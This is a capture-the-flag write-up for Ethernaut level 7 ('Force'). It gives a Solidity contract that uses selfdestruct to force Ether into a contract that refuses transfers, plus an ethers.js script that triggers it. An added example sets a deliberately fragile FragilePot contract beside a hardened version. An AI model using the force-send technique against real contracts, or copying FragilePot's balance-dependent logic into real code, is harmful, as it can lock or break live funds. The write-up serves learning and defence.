Cracking the Code: Ethernaut (Level 7 - Force) CTF Challenge

The Ethernaut is a Web3/Solidity-based wargame inspired by overthewire.org, played in the Ethereum Virtual Machine. Each level is a smart contract that needs to be 'hacked'.

This challenge tests the player's knowledge of selfdestruct.

The challenge code

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Force {/*

                   MEOW ?
         /\_/\   /
    ____/ o o \
  /~____  =ø= /
 (______)__m_m)

*/}

The goal of this challenge is to make the balance of the contract greater than zero.

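This contract does not contain any code: it has no receive or fallback function, so it will not accept Ether if we try to send it with a normal transfer. The only way to force send Ether to the challenge contract is to use selfdestruct, which transfers the destroyed contract's balance to the target address without executing any of the target's code, so the transfer cannot be refused.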

Solution

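//SPDX-License-Identifier: MIT
pragma solidity 0.8.22;

contract Destruct {
    // Payable constructor so the contract can be funded at deployment.
    constructor() payable {}

    function destroy() public {
        // Address of the Force challenge instance, cast to a payable address.
        address payable addr = (payable(address(0xB1762C3Ed308e9408AFBE137169A48Fc2fd3d117)));
        // Sends this contract's entire balance to addr without running any code there.
        selfdestruct(addr);
    }
}

const { ethers } = require("ethers");
const abi = require("../artifacts/contracts/Destruct.sol/Destruct.json");

// RPC endpoint and private key are read from environment variables.
const provider = ethers.getDefaultProvider(process.env.SEPO_API_KEY_URL);

const signer = new ethers.Wallet(process.env.SEPO_PRIVATE_KEY, provider);

(async () => {
  // Address of the deployed Destruct solution contract.
  const contract = new ethers.Contract(
    "0x4596ABC9B700A07C4AECD4CE97741A8467e0961c",
    abi.abi,
    signer
  );

  // Send the destroy() transaction and wait for it to be mined.
  const ctx = await contract.destroy();
  await ctx.wait();
})();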

The solution contract

We create a Destruct contract with a payable constructor, which allows us to send Ether into the contract during deployment. Next, we create a destroy function. Inside this function, we cast the challenge address to a payable address and pass it to selfdestruct. The reason for sending Ether to the solution contract is to ensure that, at the point of destroying it, the Ether it holds is forced into the challenge contract.

The solution script

First, we set up the ABI, provider, and signer. The ABI allows interaction with our solution contract, the provider facilitates interaction with the blockchain, and the signer is the account that signs the transactions the user sends to the contract.

The next step is to call the destroy function in the solution contract.
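
What this level means for contract authors, as an added example that is not part of the original write-up: because Ether can be forced into any address, logic that depends on address(this).balance can be broken from outside, while an internal counter cannot. The contract names FragilePot and HardenedPot, the 0.1 ether deposit size and the 1 ether target are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example: hypothetical contracts, not from the original page.
// Fragile: assumes address(this).balance only changes through deposit().
contract FragilePot {
    uint256 public constant TARGET = 1 ether;
    address public winner;

    function deposit() external payable {
        require(msg.value == 0.1 ether, "send exactly 0.1 ether");
        require(winner == address(0), "round over");
        // Even 1 wei forced in through selfdestruct makes the balance step
        // over TARGET, so this equality never holds and the pot is locked.
        if (address(this).balance == TARGET) winner = msg.sender;
    }

    function claim() external {
        require(msg.sender == winner, "not winner");
        (bool ok, ) = msg.sender.call{value: address(this).balance}("");
        require(ok, "transfer failed");
    }
}

// Hardened: game logic reads an internal counter that only deposit() updates.
contract HardenedPot {
    uint256 public constant TARGET = 1 ether;
    uint256 public totalDeposited;
    address public winner;

    function deposit() external payable {
        require(msg.value == 0.1 ether, "send exactly 0.1 ether");
        require(winner == address(0), "round over");
        totalDeposited += msg.value;
        if (totalDeposited == TARGET) winner = msg.sender;
    }

    function claim() external {
        require(msg.sender == winner, "not winner");
        uint256 amount = totalDeposited;
        totalDeposited = 0; // update state before the external call
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // Ether that arrived outside deposit(), e.g. via selfdestruct.
    function unaccounted() external view returns (uint256) {
        return address(this).balance - totalDeposited;
    }
}
```

A non-zero unaccounted() value is a useful monitoring signal that Ether reached the contract outside its own deposit path.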

Conclusion

Thank you for reading; I hope you have gained valuable insights from this explanation.